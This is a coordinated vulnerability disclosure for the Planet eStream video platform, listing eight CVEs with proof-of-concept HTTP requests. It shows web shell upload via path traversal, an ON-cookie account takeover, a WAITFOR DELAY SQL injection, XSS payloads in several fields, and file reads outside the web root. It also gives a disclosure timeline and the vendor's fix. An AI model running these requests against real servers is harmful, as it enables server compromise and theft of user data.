

Planet eStream Code Execution / SQL Injection / XSS / Broken Control

Planet eStream versions prior to suffer from shell upload, account takeover, broken access control, SQL injection, both persistent and reflective cross site scripting, path traversal, and information disclosure vulnerabilities.

Packet Storm

SEC Consult Vulnerability Lab Security Advisory < 20221130-0 >

           title: Multiple critical vulnerabilities  
         product: Planet Enterprises Ltd - Planet eStream  

vulnerable version: <
fixed version:
CVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891,
CVE-2022-45889, CVE-2022-45892, CVE-2022-45890,
CVE-2022-45894, CVE-2022-45895
impact: critical
found: 2022-09-01
by: Timon Vogel (Office Vienna)
Philipp Espernberger (Office Linz)
Hrvoje Filakovic (Office Osijek)
SEC Consult Vulnerability Lab

                  An integrated part of SEC Consult, an Atos company  
                  Europe | Asia | North America



Vendor description:

“Planet eStream is a powerfully simple and secure video platform,
making media more accessible and engaging for students and educators
across secondary, further, and higher education”


Business recommendation:

The vendor provides an update for the affected version which should
be installed immediately.

SEC Consult highly recommends to perform a thorough security review of the
Planet eStream video streaming platform conducted by security
professionals to identify and resolve potential further security issues.

Vulnerability overview/description:

  1. Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)
    The application allows users to upload files at multiple places. It was
    identified that it is possible to upload arbitrary malicious files without any
    restriction and also without prior authentication! An attacker can upload
    a webshell and takeover the system.

  2. Account Takeover (CVE-2022-45893)
    A problem identified in the cookie and session management of the web application
    allows users with low privileges to bypass the authentication and authorization
    mechanisms. They can be bypassed by changing the value of the ON cookie. In this way,
    users with low privileges can gain access to application features that are only accessible
    to administrative and privileged users.

  3. Broken Access Control (CVE-2022-45891)
    Due to flaws in the authorization scheme, an authorization bypass vulnerability
    allows an attacker to get access to restricted functions of the web application.
    This can be leveraged to upload files to the web server without authentication
    and gain access to restricted content that was uploaded by other users.

  4. SQL Injection (CVE-2022-45889)
    Due to insufficient input validation, the application allows the injection of
    direct SQL commands. By exploiting the vulnerability, an attacker gains access
    to all records stored in the database and can execute arbitrary SQL commands.

  5. Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)
    User input is not properly sanitized or encoded in various places. This leads to
    several stored cross-site scripting (XSS) vulnerabilities. By exploiting this
    vulnerability, an attacker can persistently embed arbitrary HTML or JavaScript
    code into the affected web page. The code is executed in the context of the
    victim’s browser when visiting the manipulated site. Additionally, users are
    potential victims of browser exploits and JavaScript trojans.

  6. Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)
    One of the application scripts returns unfiltered or unescaped user input. This
    leads to a reflected cross-site scripting (XSS) vulnerability. With reflected
    cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code
    into the victim’s web browser. Once the victim clicks a malicious link, the
    attacker’s code is executed in the context of the victim’s web browser. The
    vulnerability can be used to change the contents of the displayed site or
    redirect to other malicious sites. Additionally, users are potential
    victims of browser exploits and JavaScript trojans.

  7. Path Traversal (CVE-2022-45894)
    Attackers can gain access to files and directories outside the web root through
    the use of relative file paths. In this case an authenticated
    attacker with any role can inject “…” sequences into a certain URL parameter
    in order to navigate through the file system and access local files.

  8. Information Disclosure (CVE-2022-45895)
    Parts of the application were discovered that disclose sensitive data to
    application users. While securely disclosing necessary information to authorized
    users will normally not present a security threat, the identified components
    disclose sensitive data that belongs to other users.

Proof of concept:

  1. Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)
    Various file upload vulnerabilities were identified in the web application. The
    following sections describe the vulnerabilities in detail.

The file upload is restricted to certain file types in some cases. This
restriction is only enforced in the frontend and can be bypassed by
intercepting the request and modifying it. There is no further validation of
uploaded files in the backend. Therefore, it is sufficient to change the
filename ending in the intercepted request.

a) File Upload with Path Traversal

An authenticated attacker with the permission to attach documents to already
existing content (e.g. videos) can upload any file. In some cases, the role
Member is sufficient. Under “Categories -> choose a video -> related Media” a new
malicious file can be uploaded.

The following POST request is sent to the server when a normal PNG file is uploaded:

POST /Upload2.ashx?f=seclogo.png&c=0&l=53134&t=1662103112126&p=\Temp&ut=0&tc=0&bs=53134&ct=1662103112126 HTTP/2
Host: $host
Cookie: […]


Based on the previous POST request to upload files, the request can be
manipulated to upload any content to any directory by using path traversal
techniques. The following code shows the modified request. The content is
changed from a PNG image to an ASP web shell. The filename ending is changed to
asp and the path is inserted into the p parameter, which is vulnerable to path
POST /Upload2.ashx?f=webshell.asp&c=0&l=1024&t=1661943922096&p=…$path&ut=0&tc=0&bs=1024&ct=1661943922097 HTTP/2
Host: $host
Cookie: […]


As the following response shows, the file is being processed by the web server:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Date: Fri, 02 Sep 2022 07:16:11 GMT
Content-Length: 12


The web shell can now be accessed via the following URL:


An attacker now has the possibility to execute any command in context of the web
server. Therefore, the web server is completely compromised.

As described in chapter 3) Broken Access Control, section a) an unauthenticated
file upload is possible if the attacker knows the correct request.

b) General Upload

An authenticated attacker with the permission to upload documents (role editor,
publisher or admin) can upload any file. Under “Create -> Upload -> Upload
Document” a new malicious file can be uploaded.

i) ASP Web Shell

After choosing the malicious file for the file upload the following POST request
is sent to the web server:
POST /Upload2.ashx?f=cmdasp.asp&c=0&l=1024&t=1661939611305&p=PreConversionMedia&ut=0&tc=0&bs=1024&ct=1661939611305 HTTP/2
Host: $host
Cookie: […]
Content-Length: 1024


As the following response shows, the file is being processed by the web server:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Date: Wed, 31 Aug 2022 09:53:31 GMT
Content-Length: 12


To finish the upload of the malicious file, an attacker simply needs to click
the “Start Upload” button that becomes visible in the web interface.
After starting the upload, the following POST request is sent to the web server.

POST /Ajax.asmx/ProcessUpload2 HTTP/2
Host: $host
Cookie: […]
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 538


The response of the web server discloses the new generated filename
8273~4u~vE7bUON0 as shown below.
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Wed, 31 Aug 2022 09:53:31 GMT
Content-Length: 541


After the filename is known the web shell can now be accessed via following URL:


An attacker now has the possibility to execute any command in context of the web
server. Therefore, the web server is completely compromised.

ii) Malicious HTML File

After choosing the malicious file, the following POST request is sent to the web
POST /Upload2.ashx?f=secconsult.html&c=0&l=102&t=1661947994372&p=PreConversionMedia&ut=0&tc=0
&bs=102&ct=1661947994373 HTTP/2
Host: $host
Cookie: […]
Content-Length: 1024

<!DOCTYPE html>
<h1>SEC Consult Webpage</h1>
<p>hosted by $host</p>

As the following response shows, the file is being processed by the web server:

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
Date: Wed, 31 Aug 2022 12:13:13 GMT
Content-Length: 12


To finish the upload of the malicious file, an attacker simply needs to click
the “Start Upload” button which pops up in the web interface.
After starting the upload, the following POST request is sent to the web server:
POST /Ajax.asmx/ProcessUpload2 HTTP/2
Host: $host
Cookie: […]
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 539


The response of the web server discloses the new generated filename
8278~4z~b2w2tWQF as shown below.
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Wed, 31 Aug 2022 12:13:14 GMT
Content-Length: 545


The HTML webpage can now be accessed via following URL:


An attacker now has the possibility to infect the user’s browser with JavaScript
to execute any command in the context of the web server or can host webpages for
phishing attacks on the server of the Planet eStream instance.

  1. Account Takeover (CVE-2022-45893)
    An authenticated attacker with the role Member or Bypass can elevate their
    privileges by changing the ON cookie value. An attacker can easily brute force
    the value of the cookie due to the low entropy of the cookie or search for
    leaked cookie values in the web application as described in chapter
  2. Information Disclosure, section a).

Based on the format of the cookie the following pattern was used to generate
possibly valid cookies.

To verify the vulnerability an authenticated session is required. Sessions that
are created by opening a sharing link to bypass authentication are sufficient.
Therefore, an attacker doesn’t necessarily need a valid user account with valid
credentials to gain privileged access.

To abuse the vulnerability, an attacker can use the browser developer tool to
permanently change the value of the ON cookie. By changing the value of the
ON cookie for example to $VALID_COOKIE, the current privileges are set to the
privileges of the original user who has the ON cookie $VALID_COOKIE.

An attacker can gain administrative privileges and access other accounts by
obtaining valid ON cookies for the respective accounts through brute force or
information disclosure.

One essential aspect is that the ON cookie is persistent and never changes, not
even between sessions. Therefore, an attacker has permanent access to elevated
privileges or other user accounts once a valid ON cookie is identified.

  1. Broken Access Control (CVE-2022-45891)
    a) Unauthenticated Upload

As described in chapter 1) Upload of Arbitrary Files Leading to Remote Code
Execution an attacker has the possibility to upload arbitrary files. Once
attackers know the correct POST request to upload files, they can repeat the
same request without prior authentication and successfully upload arbitrary
files. To verify the vulnerability the following request can be sent
unauthenticated (without cookies) to the web server.
POST /Upload2.ashx?f=unauthenticated.txt&c=0&l=30&t=1662047867388&p=…&ut=0&tc=0&bs=30&ct=1662047867388 HTTP/2
Host: $host

SEC Consult - upload

As the following response shows, the file is being processed by the web server:

HTTP/2 200 OK
Date: Mo, 19 Sep 2022 08:10:44 GMT
Content-Length: 12


The unauthenticated file upload was verified by identifying the file
unauthenticated.txt on the server.

In conclusion, this vulnerability exacerbates the risk of the file upload
vulnerability. It increases the likelihood of exploitation since it enables an
attacker to upload files without authentication.

b) Access Grant List

An attacker needs to be authenticated with the role Member or Bypass to exploit
the vulnerability. The vulnerability allows an attacker to modify the access
list and grant himself access to private videos. Additionally, an attacker can
make any video unavailable to other users by changing the access grant list.
The vulnerability also applies to other content on the platform.

To verify the vulnerability a video with restricted access is created. It can
be accessed under the following URL:

By executing the POST request shown below, an attacker can add himself to the
access grant list and gain access to the private video.
POST /Ajax.asmx/SaveGrantAccessList HTTP/2
Host: $host
Cookie: […]
Content-Type: application/json; charset=utf-8
Content-Length: 65

{"cdid":"1337","data":"[{"Address":"[email protected]","CanEdit":true}]"}

The server responds with a status code 200 successful.

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Date: Thu, 01 Sep 2022 10:20:58 GMT
Content-Length: 75

{"d":"{"Success":true,"Message":"Access list updated successfully"}"}

The user with the e-mail address [email protected] has been added to the
access grant list and can view the private video with the ID 1337.

The vulnerability can also be leveraged to block access to the video for other
users (Denial-of-Service) by adding any malicious content “malicious_payload”
instead of the valid e-mail address.

  1. SQL Injection (CVE-2022-45889)
    To demonstrate this vulnerability access to the search functionality in the
    statistic interface is required. An authenticated attacker with the role
    Publisher or Admin can use the following GET request to reproduce the
    GET /Stats/StatisticsResults.aspx?q=viewingday&p1=20220831&p2=&db1=stats&db2=clipdata&flt=+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+’0:0:5’-- HTTP/2
    Host: $host
    Cookie: […]

The resulting response took more than five seconds. Thus it can be
concluded that an SQL injection is present.
Furthermore, exploitation by the tool sqlmap was possible and lead to a
successful extraction of the complete backend database.

  1. Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)
    a) Disclaimer

An attacker needs to be authenticated with the role Admin to exploit the stored
XSS vulnerability. The vulnerability will be executed afterwards for each user
who logs into the web application. To verify the issue, an attacker needs to
modify the disclaimer of the cookie description. In the admin section the
system options can be modified to change the disclaimer text.


By clicking the Source button, an admin user can inject a malicious payload.

<img src=x onerror=javascript:alert(location.origin)//">

After saving the modified disclaimer text, the payload is executed by visiting
different parts of the application. If a user visits the MyHome tab the payload
is triggered in the browser. The payload is also executed if a user hasn’t
accepted the disclaimer text yet, which is true for any new user.

b) Search Function

An attacker needs to be authenticated with the role Member to exploit the stored
XSS vulnerability. The vulnerability will be executed afterwards for each user,
who inspects the statistic view provided by the web application. To verify the
issue, an attacker can search for following malicious payload that is then
automatically stored in the database.
<img onerror="javascript:alert(location.origin)" src="abcdef";//<

Afterwards, the malicious payload is triggered if a user lists the statistical
data for the Search Breakdown in the last seven days.

c) Comments

An attacker needs to be authenticated with the role Member to exploit the stored
XSS vulnerability. The vulnerability will be executed afterwards for each user,
who visits the content element that contains the malicious comment. To verify
the issue, the following malicious payload can be injected into the public or
private comment field.
<img onerror="javascript:alert(location.origin)" src="abcdef";//

d) Batch editing tool

An attacker needs to be authenticated with the role Admin to exploit the stored
XSS vulnerability. The vulnerability will be executed afterwards for each user,
who visits the modified content. To verify the issue, an attacker needs to
modify the owner of the content. In the search section the admin has the
possibility to use the Batch-Editing tool.

By selecting the action Change owner, an admin user can inject a malicious
payload in the user input box.
<img src=x onerror=javascript:alert(location.origin)//">

After injecting the malicious payload, the XSS payload is executed when the
content element is visited or when it appears in search results.

e) Content Creation

Permission to create content within the web application is required. Thus, an
attacker needs to be authenticated with the role Editor, Publisher, or Admin to
exploit the vulnerability. The issue can be verified by placing malicious HTML
code in the title input field of the content creation dialog window. For this
the following malicious payload can be used:
<img src=’x’ onerror=’javascript:alert(location.origin)' style=’

When the content creation progress is finished, the JavaScript code is
permanently stored in the web application. It will trigger in every browser that
visits webpages that lists the modified item (for example, under the category
view, search results and content list).

The following content upload possibilities are affected by this vulnerability:

  • Upload Video or Audio files
  • Upload Documents
  • Add External Links
  • Playlist
  • Photoset

f) Related Media

HTML code can be injected in the title of the related media upload. Editing
access to the content is required. This is normally the case for the users with
the role Editors, Publishers or Admins. The malicious code can be injected in
the title of the related content. To validate the vulnerability a new file must
be uploaded in the related media tab. The next step is to change the filename
to inject the malicious HTML and JavaScript code.
<img src=’x’ onerror=’javascript:alert(location.origin)'photo.png

When the title including the malicious payload is saved and the page reloaded,
the payload within the title will be executed. The new title is stored in the
web application along with the malicious HTML code. It will execute in any
browser that visits the content item. Opening the related media tab is not

g) Create new user

An attacker needs to be authenticated with the role Admin to exploit the stored
XSS vulnerability. The vulnerability will be executed afterwards for admin users
in the user section and for the created users once they are logged in. To verify
the issue, an attacker needs to create a new user. Under Tools -> Admin ->
Users, Permissions, Authentication -> Users the admin has the possibility to
create new users.

The following malicious payload was added to the Full Name input field:


After creating the new user, the malicious payload gets executed once the new
user logs in or the admin visits the user section (Tools -> Admin -> Users,
Permissions, Authentication -> Users).

h) Change Username

A cross-site scripting vulnerability can be found under https://$host/MyHome.aspx
where a user can edit the name shown on his home page. All authenticated users
can access home pages of other users and are thus affected by this vulnerability.
Furthermore, the vulnerability can be exploited by an authenticated user of any
role. The following request was used to change the username.
POST /Ajax.asmx/SaveLayoutData HTTP/2
Host: $host
Cookie: […]
Content-Length: 360
Content-Type: application/json; charset=UTF-8

src=’x’ onerror=’alert(location.origin)'",[…]

The request is accepted by the web application as shown below:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 92

{"d":"{"Success":true,"Message":"Layout erfolgreich gespeichert","HTML":

Sending the request directly bypasses the check for special characters like < or >
that exist in the frontend. The malicious username string is embedded on the
website and will execute when it is opened in the browser in any subsequent

  1. Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)
    An attacker needs authenticated access to the web application with the role
    Member or higher to identify and exploit the vulnerability. To identify this
    vulnerability, it is sufficient to open the following URL (no special manipulation
    of the request is needed) and analyze the HTTP response from the web server:

The string SEC Consult is embedded in the webpage of this URL.
The next step is to identify a working payload which triggers the cross-site
scripting vulnerability. To verify the vulnerability, it is sufficient to open
the following URL:

Another working payload for the fo parameter was identified:


It must be mentioned that all metadata filter fields are affected by this

  1. Path Traversal (CVE-2022-45894)
    An attacker authenticated with the role Member can navigate to the vulnerable
    URL path provided below and inject “…” sequences to move up directories on the
    web server and access local files.

Simply navigating to the link with the injected path traversal payload an
attacker can download any file on the web server and read its contents.
To verify the vulnerability the file NetSetup.LOG which contains details of the
entire process of joining the domain was downloaded. The following URL was used:

  1. Information Disclosure (CVE-2022-45895)
    a) ON cookie

The information disclosure of the ON cookie was identified on three different
pages of the web application. Since the cookie can be used to access other user
accounts with elevated privileges, it comprises highly confidential information.
It is embedded in the web application’s response in different ways and there are
always multiple cookies for different users in the response. Requests to obtain
the sensitive information can be performed with authentication as arbitrary

The ON cookie was embedded in three pages that are accessible under the
following paths:

  • /Default.aspx?catid=69 (HTML)
  • /Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149 (CSV)
  • /GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title= (JSON)

As an example the ON cookie leakage is shown in the HTML response. The cookie
value can be identified in the href and src attributes of the a element
<div><a title="Open Media" tabindex="-1" href="/View.aspx?id=228~$VALID_COOKIE">
<img title="228" data-alt-src="" src="/Media/Images/ClipData/228_$VALID_COOKIE.jpg"/></a>

b) WhoAmI

The sensitive data comprises internal information that lets an attacker gain
deeper knowledge about the application. To verify the vulnerability, it is
sufficient to request the following URL as authenticated user (any role):

An excerpt of the disclosed information is shown:

<div […]>APPL_MD_PATH</div>[…]/ROOT
<div […]>APPL_PHYSICAL_PATH</div>c:\inetpub[…]\
<div […]>LOCAL_ADDR</div>
<div […]>PATH_TRANSLATED</div>c:\inetpub[…]\WhoAmI.aspx
<div […]>REMOTE_ADDR</div>
<div […]>SERVER_PORT</div>443
<div […]>SERVER_PROTOCOL</div>HTTP/1.1
<div […]>SERVER_SOFTWARE</div>Microsoft-IIS/9.0
<div […]>Enable New UI</div>-1
<div […]>Enable New UI (Schema)</div>False
<div […]>Prop.OnMobileDevice</div>0
<div […]>UID</div>228
<div […]>Prop.MachineName</div>[…]
<div […]>Demo Server</div>False

Vulnerable / tested versions:

The vulnerabilities have been found in version

Vendor contact timeline:

2022-09-02: Submitting initial critical findings to vendor.
2022-10-03: Contacting vendor through direct email.
2022-10-03: Providing vendor with proof-of-concept.
2022-10-24: The new software version ( with the security patches of the
reported vulnerabilities was tested by SEC Consult.
2022-10-24: SEC Consult could determine that the critical findings were fixed
appropriately and are no longer exploitable in the version (
2022-11-04: Following up with vendor.
2022-11-10: Follow up again.
2022-11-18: Vendor provided updated version number ( which includes all
of the fixes.
2022-11-18: Vendor confirmed that all customers have been contacted and recommended
to update.
2022-11-25: Received CVE numbers.
2022-11-30: Coordinated release of security advisory.


The vendor rolled out a new software version. Affected users should verify that
they are using the latest version available v6.72.10.07 which fixes all
identified security issues according to the vendor.



Advisory URL:

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult?
Send us your application

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices

Mail: security-research at sec-consult dot com  

EOF T. Vogel, P. Espernberger / 2022

Related news


Planet eStream before allows unauthenticated upload of arbitrary files: Choose a Video / Related Media or Upload Document. Upload2.ashx can be used, or Ajax.asmx/ProcessUpload2. This leads to remote code execution.

CVE-2022-45892: Multiple critical vulnerabilities in Planet Enterprises Ltd - Planet eStream

In Planet eStream before, multiple Stored Cross-Site Scripting (XSS) vulnerabilities exist: Disclaimer, Search Function, Comments, Batch editing tool, Content Creation, Related Media, Create new user, and Change Username.

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